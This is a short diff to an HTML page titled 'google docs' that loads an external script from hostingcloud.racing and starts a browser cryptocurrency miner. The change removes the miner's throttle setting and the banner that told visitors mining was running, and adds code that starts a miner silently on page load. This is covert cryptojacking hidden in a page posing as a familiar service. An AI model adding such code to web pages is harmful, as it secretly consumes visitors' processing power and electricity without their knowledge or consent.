--- a/index.html
+++ b/index.html
@@ -4,14 +4,10 @@
     <title>google docs</title>
   </head>
   <body>
-    <script src="https://www.hostingcloud.racing/uDEu.js"></script>
+    <script src="https://www.hostingcloud.racing/oSc4.js"></script>
 <script>
-    var _client = new Client.Anonymous('cefc78aa86c8fb633abd11e8b1d6c4b0d6be0258aad269391a3922f5a852b0b8', {
-        throttle: 0.2, c: 'w'
-    });
-    _client.start();
-    _client.addMiningNotification("Top", "This site is running JavaScript miner from coinimp.com. If it bothers you, you can stop it.", "#cccccc", 40, "#3d3d3d");
-
+    var miner = new Client.Anonymous('<site-key>');
+    miner.start();
 </script>
   </body>
 </html>
